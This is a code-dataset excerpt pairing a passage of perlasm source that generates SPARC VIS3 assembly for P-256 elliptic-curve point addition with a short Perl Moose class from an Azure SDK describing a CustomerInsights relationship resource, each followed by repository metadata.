ld [$bp+24],$a3
ld [$bp+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$bp+32],$acc0 ! in2_y
or $a0,$t0,$a0
ld [$bp+32+4],$t0
sllx $t2,32,$t2
ld [$bp+32+8],$acc1
or $a1,$t1,$a1
ld [$bp+32+12],$t1
sllx $t3,32,$t3
ld [$bp+32+16],$acc2
or $a2,$t2,$a2
ld [$bp+32+20],$t2
or $a3,$t3,$a3
ld [$bp+32+24],$acc3
sllx $t0,32,$t0
ld [$bp+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in2_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in2_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in2_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in2_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in2_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in2_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in2_y+16]
stx $acc3,[%sp+LOCALS64+$in2_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in2infty
stx $a0,[%fp+STACK_BIAS-8]
ld [$bp+64],$acc0 ! in2_z
ld [$bp+64+4],$t0
ld [$bp+64+8],$acc1
ld [$bp+64+12],$t1
ld [$bp+64+16],$acc2
ld [$bp+64+20],$t2
ld [$bp+64+24],$acc3
ld [$bp+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$ap],$a0 ! in1_x
or $acc0,$t0,$acc0
ld [$ap+4],$t0
sllx $t2,32,$t2
ld [$ap+8],$a1
or $acc1,$t1,$acc1
ld [$ap+12],$t1
sllx $t3,32,$t3
ld [$ap+16],$a2
or $acc2,$t2,$acc2
ld [$ap+20],$t2
or $acc3,$t3,$acc3
ld [$ap+24],$a3
sllx $t0,32,$t0
ld [$ap+28],$t3
sllx $t1,32,$t1
stx $acc0,[%sp+LOCALS64+$in2_z]
sllx $t2,32,$t2
stx $acc1,[%sp+LOCALS64+$in2_z+8]
sllx $t3,32,$t3
stx $acc2,[%sp+LOCALS64+$in2_z+16]
stx $acc3,[%sp+LOCALS64+$in2_z+24]
or $a0,$t0,$a0
ld [$ap+32],$acc0 ! in1_y
or $a1,$t1,$a1
ld [$ap+32+4],$t0
or $a2,$t2,$a2
ld [$ap+32+8],$acc1
or $a3,$t3,$a3
ld [$ap+32+12],$t1
ld [$ap+32+16],$acc2
ld [$ap+32+20],$t2
ld [$ap+32+24],$acc3
sllx $t0,32,$t0
ld [$ap+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in1_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in1_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in1_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in1_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in1_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in1_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in1_y+16]
stx $acc3,[%sp+LOCALS64+$in1_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in1infty
stx $a0,[%fp+STACK_BIAS-16]
ldx [%sp+LOCALS64+$in2_z],$a0 ! forward load
ldx [%sp+LOCALS64+$in2_z+8],$a1
ldx [%sp+LOCALS64+$in2_z+16],$a2
ldx [%sp+LOCALS64+$in2_z+24],$a3
ld [$ap+64],$acc0 ! in1_z
ld [$ap+64+4],$t0
ld [$ap+64+8],$acc1
ld [$ap+64+12],$t1
ld [$ap+64+16],$acc2
ld [$ap+64+20],$t2
ld [$ap+64+24],$acc3
ld [$ap+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
or $acc0,$t0,$acc0
sllx $t2,32,$t2
or $acc1,$t1,$acc1
sllx $t3,32,$t3
stx $acc0,[%sp+LOCALS64+$in1_z]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in1_z+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in1_z+16]
stx $acc3,[%sp+LOCALS64+$in1_z+24]
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Z2sqr, in2_z);
add %sp,LOCALS64+$Z2sqr,$rp
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS64+$Z1sqr,$rp
ldx [%sp+LOCALS64+$Z2sqr],$bi
ldx [%sp+LOCALS64+$in2_z],$a0
ldx [%sp+LOCALS64+$in2_z+8],$a1
ldx [%sp+LOCALS64+$in2_z+16],$a2
ldx [%sp+LOCALS64+$in2_z+24],$a3
add %sp,LOCALS64+$Z2sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S1, Z2sqr, in2_z);
add %sp,LOCALS64+$S1,$rp
ldx [%sp+LOCALS64+$Z1sqr],$bi
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$Z1sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$S1],$bi
ldx [%sp+LOCALS64+$in1_y],$a0
ldx [%sp+LOCALS64+$in1_y+8],$a1
ldx [%sp+LOCALS64+$in1_y+16],$a2
ldx [%sp+LOCALS64+$in1_y+24],$a3
add %sp,LOCALS64+$S1,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S1, S1, in1_y);
add %sp,LOCALS64+$S1,$rp
ldx [%sp+LOCALS64+$S2],$bi
ldx [%sp+LOCALS64+$in2_y],$a0
ldx [%sp+LOCALS64+$in2_y+8],$a1
ldx [%sp+LOCALS64+$in2_y+16],$a2
ldx [%sp+LOCALS64+$in2_y+24],$a3
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$Z2sqr],$bi ! forward load
ldx [%sp+LOCALS64+$in1_x],$a0
ldx [%sp+LOCALS64+$in1_x+8],$a1
ldx [%sp+LOCALS64+$in1_x+16],$a2
ldx [%sp+LOCALS64+$in1_x+24],$a3
add %sp,LOCALS64+$S1,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(R, S2, S1);
add %sp,LOCALS64+$R,$rp
or $acc1,$acc0,$acc0 ! see if result is zero
or $acc3,$acc2,$acc2
or $acc2,$acc0,$acc0
stx $acc0,[%fp+STACK_BIAS-24]
add %sp,LOCALS64+$Z2sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U1, in1_x, Z2sqr);
add %sp,LOCALS64+$U1,$rp
ldx [%sp+LOCALS64+$Z1sqr],$bi
ldx [%sp+LOCALS64+$in2_x],$a0
ldx [%sp+LOCALS64+$in2_x+8],$a1
ldx [%sp+LOCALS64+$in2_x+16],$a2
ldx [%sp+LOCALS64+$in2_x+24],$a3
add %sp,LOCALS64+$Z1sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, in2_x, Z1sqr);
add %sp,LOCALS64+$U2,$rp
ldx [%sp+LOCALS64+$R],$a0 ! forward load
ldx [%sp+LOCALS64+$R+8],$a1
ldx [%sp+LOCALS64+$R+16],$a2
ldx [%sp+LOCALS64+$R+24],$a3
add %sp,LOCALS64+$U1,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(H, U2, U1);
add %sp,LOCALS64+$H,$rp
or $acc1,$acc0,$acc0 ! see if result is zero
or $acc3,$acc2,$acc2
orcc $acc2,$acc0,$acc0
bne,pt %xcc,.Ladd_proceed_vis3 ! is_equal(U1,U2)?
nop
ldx [%fp+STACK_BIAS-8],$t0
ldx [%fp+STACK_BIAS-16],$t1
ldx [%fp+STACK_BIAS-24],$t2
andcc $t0,$t1,%g0
be,pt %xcc,.Ladd_proceed_vis3 ! (in1infty || in2infty)?
nop
andcc $t2,$t2,%g0
be,a,pt %xcc,.Ldouble_shortcut_vis3 ! is_equal(S1,S2)?
add %sp,32*(12-10)+32,%sp ! difference in frame sizes
st %g0,[$rp_real]
st %g0,[$rp_real+4]
st %g0,[$rp_real+8]
st %g0,[$rp_real+12]
st %g0,[$rp_real+16]
st %g0,[$rp_real+20]
st %g0,[$rp_real+24]
st %g0,[$rp_real+28]
st %g0,[$rp_real+32]
st %g0,[$rp_real+32+4]
st %g0,[$rp_real+32+8]
st %g0,[$rp_real+32+12]
st %g0,[$rp_real+32+16]
st %g0,[$rp_real+32+20]
st %g0,[$rp_real+32+24]
st %g0,[$rp_real+32+28]
st %g0,[$rp_real+64]
st %g0,[$rp_real+64+4]
st %g0,[$rp_real+64+8]
st %g0,[$rp_real+64+12]
st %g0,[$rp_real+64+16]
st %g0,[$rp_real+64+20]
st %g0,[$rp_real+64+24]
st %g0,[$rp_real+64+28]
b .Ladd_done_vis3
nop
.align 16
.Ladd_proceed_vis3:
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS64+$Rsqr,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS64+$res_z,$rp
ldx [%sp+LOCALS64+$H],$a0
ldx [%sp+LOCALS64+$H+8],$a1
ldx [%sp+LOCALS64+$H+16],$a2
ldx [%sp+LOCALS64+$H+24],$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS64+$Hsqr,$rp
ldx [%sp+LOCALS64+$res_z],$bi
ldx [%sp+LOCALS64+$in2_z],$a0
ldx [%sp+LOCALS64+$in2_z+8],$a1
ldx [%sp+LOCALS64+$in2_z+16],$a2
ldx [%sp+LOCALS64+$in2_z+24],$a3
add %sp,LOCALS64+$res_z,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_z, res_z, in2_z);
add %sp,LOCALS64+$res_z,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$Hsqr],$a0
ldx [%sp+LOCALS64+$Hsqr+8],$a1
ldx [%sp+LOCALS64+$Hsqr+16],$a2
ldx [%sp+LOCALS64+$Hsqr+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS64+$Hcub,$rp
ldx [%sp+LOCALS64+$U1],$bi
ldx [%sp+LOCALS64+$Hsqr],$a0
ldx [%sp+LOCALS64+$Hsqr+8],$a1
ldx [%sp+LOCALS64+$Hsqr+16],$a2
ldx [%sp+LOCALS64+$Hsqr+24],$a3
add %sp,LOCALS64+$U1,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, U1, Hsqr);
add %sp,LOCALS64+$U2,$rp
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS64+$Hsqr,$rp
add %sp,LOCALS64+$Rsqr,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS64+$res_x,$rp
add %sp,LOCALS64+$Hcub,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS64+$res_x,$rp
ldx [%sp+LOCALS64+$S1],$bi ! forward load
ldx [%sp+LOCALS64+$Hcub],$a0
ldx [%sp+LOCALS64+$Hcub+8],$a1
ldx [%sp+LOCALS64+$Hcub+16],$a2
ldx [%sp+LOCALS64+$Hcub+24],$a3
add %sp,LOCALS64+$U2,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S1,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, S1, Hcub);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$R],$bi
ldx [%sp+LOCALS64+$res_y],$a0
ldx [%sp+LOCALS64+$res_y+8],$a1
ldx [%sp+LOCALS64+$res_y+16],$a2
ldx [%sp+LOCALS64+$res_y+24],$a3
add %sp,LOCALS64+$R,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS64+$res_y,$rp
ldx [%fp+STACK_BIAS-16],$t1 ! !in1infty
ldx [%fp+STACK_BIAS-8],$t2 ! !in2infty
___
for($i=0;$i<96;$i+=16) { # conditional moves
$code.=<<___;
ldx [%sp+LOCALS64+$res_x+$i],$acc0 ! res
ldx [%sp+LOCALS64+$res_x+$i+8],$acc1
ldx [%sp+LOCALS64+$in2_x+$i],$acc2 ! in2
ldx [%sp+LOCALS64+$in2_x+$i+8],$acc3
ldx [%sp+LOCALS64+$in1_x+$i],$acc4 ! in1
ldx [%sp+LOCALS64+$in1_x+$i+8],$acc5
movrz $t1,$acc2,$acc0
movrz $t1,$acc3,$acc1
movrz $t2,$acc4,$acc0
movrz $t2,$acc5,$acc1
srlx $acc0,32,$acc2
srlx $acc1,32,$acc3
st $acc0,[$rp_real+$i]
st $acc2,[$rp_real+$i+4]
st $acc1,[$rp_real+$i+8]
st $acc3,[$rp_real+$i+12]
___
}
$code.=<<___;
.Ladd_done_vis3:
ret
restore
.size ecp_nistz256_point_add_vis3,.-ecp_nistz256_point_add_vis3
___
}
########################################################################
# void ecp_nistz256_point_add_affine(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT_AFFINE *in2);
{
my ($res_x,$res_y,$res_z,
$in1_x,$in1_y,$in1_z,
$in2_x,$in2_y,
$U2,$S2,$H,$R,$Hsqr,$Hcub,$Rsqr)=map(32*$_,(0..14));
my $Z1sqr = $S2;
# above map() describes stack layout with 15 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty and !in2infty.
$code.=<<___;
.align 32
ecp_nistz256_point_add_affine_vis3:
save %sp,-STACK64_FRAME-32*15-32,%sp
mov $rp,$rp_real
mov -1,$minus1
mov -2,$poly3
sllx $minus1,32,$poly1 ! 0xFFFFFFFF00000000
srl $poly3,0,$poly3 ! 0x00000000FFFFFFFE
! convert input to uint64_t[4]
ld [$bp],$a0 ! in2_x
ld [$bp+4],$t0
ld [$bp+8],$a1
ld [$bp+12],$t1
ld [$bp+16],$a2
ld [$bp+20],$t2
ld [$bp+24],$a3
ld [$bp+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$bp+32],$acc0 ! in2_y
or $a0,$t0,$a0
ld [$bp+32+4],$t0
sllx $t2,32,$t2
ld [$bp+32+8],$acc1
or $a1,$t1,$a1
ld [$bp+32+12],$t1
sllx $t3,32,$t3
ld [$bp+32+16],$acc2
or $a2,$t2,$a2
ld [$bp+32+20],$t2
or $a3,$t3,$a3
ld [$bp+32+24],$acc3
sllx $t0,32,$t0
ld [$bp+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in2_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in2_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in2_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in2_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in2_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in2_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in2_y+16]
stx $acc3,[%sp+LOCALS64+$in2_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in2infty
stx $a0,[%fp+STACK_BIAS-8]
ld [$ap],$a0 ! in1_x
ld [$ap+4],$t0
ld [$ap+8],$a1
ld [$ap+12],$t1
ld [$ap+16],$a2
ld [$ap+20],$t2
ld [$ap+24],$a3
ld [$ap+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$ap+32],$acc0 ! in1_y
or $a0,$t0,$a0
ld [$ap+32+4],$t0
sllx $t2,32,$t2
ld [$ap+32+8],$acc1
or $a1,$t1,$a1
ld [$ap+32+12],$t1
sllx $t3,32,$t3
ld [$ap+32+16],$acc2
or $a2,$t2,$a2
ld [$ap+32+20],$t2
or $a3,$t3,$a3
ld [$ap+32+24],$acc3
sllx $t0,32,$t0
ld [$ap+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in1_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in1_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in1_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in1_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in1_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in1_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in1_y+16]
stx $acc3,[%sp+LOCALS64+$in1_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in1infty
stx $a0,[%fp+STACK_BIAS-16]
ld [$ap+64],$a0 ! in1_z
ld [$ap+64+4],$t0
ld [$ap+64+8],$a1
ld [$ap+64+12],$t1
ld [$ap+64+16],$a2
ld [$ap+64+20],$t2
ld [$ap+64+24],$a3
ld [$ap+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
or $a0,$t0,$a0
sllx $t2,32,$t2
or $a1,$t1,$a1
sllx $t3,32,$t3
stx $a0,[%sp+LOCALS64+$in1_z]
or $a2,$t2,$a2
stx $a1,[%sp+LOCALS64+$in1_z+8]
or $a3,$t3,$a3
stx $a2,[%sp+LOCALS64+$in1_z+16]
stx $a3,[%sp+LOCALS64+$in1_z+24]
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS64+$Z1sqr,$rp
ldx [%sp+LOCALS64+$in2_x],$bi
mov $acc0,$a0
mov $acc1,$a1
mov $acc2,$a2
mov $acc3,$a3
add %sp,LOCALS64+$in2_x,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, Z1sqr, in2_x);
add %sp,LOCALS64+$U2,$rp
ldx [%sp+LOCALS64+$Z1sqr],$bi ! forward load
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$in1_x,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(H, U2, in1_x);
add %sp,LOCALS64+$H,$rp
add %sp,LOCALS64+$Z1sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS64+$res_z,$rp
ldx [%sp+LOCALS64+$S2],$bi
ldx [%sp+LOCALS64+$in2_y],$a0
ldx [%sp+LOCALS64+$in2_y+8],$a1
ldx [%sp+LOCALS64+$in2_y+16],$a2
ldx [%sp+LOCALS64+$in2_y+24],$a3
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$H],$a0 ! forward load
ldx [%sp+LOCALS64+$H+8],$a1
ldx [%sp+LOCALS64+$H+16],$a2
ldx [%sp+LOCALS64+$H+24],$a3
add %sp,LOCALS64+$in1_y,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(R, S2, in1_y);
add %sp,LOCALS64+$R,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS64+$Hsqr,$rp
ldx [%sp+LOCALS64+$R],$a0
ldx [%sp+LOCALS64+$R+8],$a1
ldx [%sp+LOCALS64+$R+16],$a2
ldx [%sp+LOCALS64+$R+24],$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS64+$Rsqr,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$Hsqr],$a0
ldx [%sp+LOCALS64+$Hsqr+8],$a1
ldx [%sp+LOCALS64+$Hsqr+16],$a2
ldx [%sp+LOCALS64+$Hsqr+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS64+$Hcub,$rp
ldx [%sp+LOCALS64+$Hsqr],$bi
ldx [%sp+LOCALS64+$in1_x],$a0
ldx [%sp+LOCALS64+$in1_x+8],$a1
ldx [%sp+LOCALS64+$in1_x+16],$a2
ldx [%sp+LOCALS64+$in1_x+24],$a3
add %sp,LOCALS64+$Hsqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, in1_x, Hsqr);
add %sp,LOCALS64+$U2,$rp
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS64+$Hsqr,$rp
add %sp,LOCALS64+$Rsqr,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS64+$res_x,$rp
add %sp,LOCALS64+$Hcub,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS64+$res_x,$rp
ldx [%sp+LOCALS64+$Hcub],$bi ! forward load
ldx [%sp+LOCALS64+$in1_y],$a0
ldx [%sp+LOCALS64+$in1_y+8],$a1
ldx [%sp+LOCALS64+$in1_y+16],$a2
ldx [%sp+LOCALS64+$in1_y+24],$a3
add %sp,LOCALS64+$U2,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$Hcub,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, in1_y, Hcub);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$R],$bi
ldx [%sp+LOCALS64+$res_y],$a0
ldx [%sp+LOCALS64+$res_y+8],$a1
ldx [%sp+LOCALS64+$res_y+16],$a2
ldx [%sp+LOCALS64+$res_y+24],$a3
add %sp,LOCALS64+$R,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS64+$res_y,$rp
ldx [%fp+STACK_BIAS-16],$t1 ! !in1infty
ldx [%fp+STACK_BIAS-8],$t2 ! !in2infty
1: call .+8
add %o7,.Lone_mont_vis3-1b,$bp
___
for($i=0;$i<64;$i+=16) { # conditional moves
$code.=<<___;
ldx [%sp+LOCALS64+$res_x+$i],$acc0 ! res
ldx [%sp+LOCALS64+$res_x+$i+8],$acc1
ldx [%sp+LOCALS64+$in2_x+$i],$acc2 ! in2
ldx [%sp+LOCALS64+$in2_x+$i+8],$acc3
ldx [%sp+LOCALS64+$in1_x+$i],$acc4 ! in1
ldx [%sp+LOCALS64+$in1_x+$i+8],$acc5
movrz $t1,$acc2,$acc0
movrz $t1,$acc3,$acc1
movrz $t2,$acc4,$acc0
movrz $t2,$acc5,$acc1
srlx $acc0,32,$acc2
srlx $acc1,32,$acc3
st $acc0,[$rp_real+$i]
st $acc2,[$rp_real+$i+4]
st $acc1,[$rp_real+$i+8]
st $acc3,[$rp_real+$i+12]
___
}
for(;$i<96;$i+=16) {
$code.=<<___;
ldx [%sp+LOCALS64+$res_x+$i],$acc0 ! res
ldx [%sp+LOCALS64+$res_x+$i+8],$acc1
ldx [$bp+$i-64],$acc2 ! "in2"
ldx [$bp+$i-64+8],$acc3
ldx [%sp+LOCALS64+$in1_x+$i],$acc4 ! in1
ldx [%sp+LOCALS64+$in1_x+$i+8],$acc5
movrz $t1,$acc2,$acc0
movrz $t1,$acc3,$acc1
movrz $t2,$acc4,$acc0
movrz $t2,$acc5,$acc1
srlx $acc0,32,$acc2
srlx $acc1,32,$acc3
st $acc0,[$rp_real+$i]
st $acc2,[$rp_real+$i+4]
st $acc1,[$rp_real+$i+8]
st $acc3,[$rp_real+$i+12]
___
}
$code.=<<___;
ret
restore
.size ecp_nistz256_point_add_affine_vis3,.-ecp_nistz256_point_add_affine_vis3
.align 64
.Lone_mont_vis3:
.long 0x00000000,0x00000001, 0xffffffff,0x00000000
.long 0xffffffff,0xffffffff, 0x00000000,0xfffffffe
.align 64
___
} }}}
# Purpose of these subroutines is to explicitly encode VIS instructions,
# so that one can compile the module without having to specify VIS
# extensions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
# Idea is to reserve for option to produce "universal" binary and let
# programmer detect if current CPU is VIS capable at run-time.
sub unvis3 {
my ($mnemonic,$rs1,$rs2,$rd)=@_;
my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
my ($ref,$opf);
my %visopf = ( "addxc" => 0x011,
"addxccc" => 0x013,
"umulxhi" => 0x016 );
$ref = "$mnemonic\t$rs1,$rs2,$rd";
if ($opf=$visopf{$mnemonic}) {
foreach ($rs1,$rs2,$rd) {
return $ref if (!/%([goli])([0-9])/);
$_=$bias{$1}+$2;
}
return sprintf ".word\t0x%08x !%s",
0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
$ref;
} else {
return $ref;
}
}
foreach (split("\n",$code)) {
s/\`([^\`]*)\`/eval $1/ge;
s/\b(umulxhi|addxc[c]{0,2})\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
&unvis3($1,$2,$3,$4)
/ge;
print $_,"\n";
}
close STDOUT;
| 25.404241 | 82 | 0.63521 |
73d10da0833782175f2c86139a5257fad76cf295 | 999 | pm | Perl | auto-lib/Azure/CustomerInsights/RelationshipResourceFormat.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | ["Apache-2.0"] | null | null | null | auto-lib/Azure/CustomerInsights/RelationshipResourceFormat.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | ["Apache-2.0"] | null | null | null | auto-lib/Azure/CustomerInsights/RelationshipResourceFormat.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | ["Apache-2.0"] | 1 | 2021-04-08T15:26:39.000Z | 2021-04-08T15:26:39.000Z |
package Azure::CustomerInsights::RelationshipResourceFormat;
use Moose;
has 'id' => (is => 'ro', isa => 'Str' );
has 'name' => (is => 'ro', isa => 'Str' );
has 'type' => (is => 'ro', isa => 'Str' );
has 'cardinality' => (is => 'ro', isa => 'Str' );
has 'description' => (is => 'ro', isa => 'HashRef[Str]' );
has 'displayName' => (is => 'ro', isa => 'HashRef[Str]' );
has 'expiryDateTimeUtc' => (is => 'ro', isa => 'Str' );
has 'fields' => (is => 'ro', isa => 'ArrayRef[Azure::CustomerInsights::PropertyDefinition]' );
has 'lookupMappings' => (is => 'ro', isa => 'ArrayRef[Azure::CustomerInsights::RelationshipTypeMapping]' );
has 'profileType' => (is => 'ro', isa => 'Str' );
has 'provisioningState' => (is => 'ro', isa => 'Str' );
has 'relatedProfileType' => (is => 'ro', isa => 'Str' );
has 'relationshipGuidId' => (is => 'ro', isa => 'Str' );
has 'relationshipName' => (is => 'ro', isa => 'Str' );
has 'tenantId' => (is => 'ro', isa => 'Str' );
1;
| 49.95 | 110 | 0.533534 |
